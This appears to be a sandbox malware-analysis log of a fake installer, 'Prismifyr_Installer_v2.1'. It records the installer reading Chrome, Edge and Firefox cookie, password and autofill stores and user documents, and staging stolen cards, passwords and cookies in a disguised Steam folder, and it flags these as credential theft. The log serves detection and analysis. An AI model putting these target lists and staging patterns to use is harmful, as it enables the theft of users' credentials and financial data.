Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Videos VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\EWZCVGNOWT.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\NWCXBPIUYI VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\QCFWYSKMHA VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Documents VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Music VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Documents\SUAVTZKNFL.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Documents\ZGGKNSUKOP.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Downloads VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Downloads\EEGWXUHVUG.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Downloads\GAOBCVIQIJ.docx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Downloads\PALRGUCVEH.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Downloads\PWCCAWLGRE.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Downloads\QCFWYSKMHA.docx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Pictures VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Downloads VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Pictures VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Documents VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Downloads\QNCYCDFIJJ.docx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Pictures VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Documents\JDDHMPCDUJ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GAOBCVIQIJ.docx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GAOBCVIQIJ.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QLSSZNHVJI.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.docx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TWKDBEMPGR.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZGGKNSUKOP.docx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZQIXMVQGAH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Pictures VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZQIXMVQGAH.docx VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\screenCapture_1.3.2.bat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib\win32\app.manifest VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Passwords\Passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Autofills\Autofills.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Wallets VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\History\History.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Vpn Tokens-journal VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ProgramData\Passwords\Passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\Documents VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe VolumeInformation
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040338F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information
barindex
Detected generic credential text file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Credit Card\Cards.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Cookies\Google_Default.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Passwords\Passwords.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\ProgramData\Passwords\Passwords.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Autofills\Autofills.txt Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db Jump to behavior
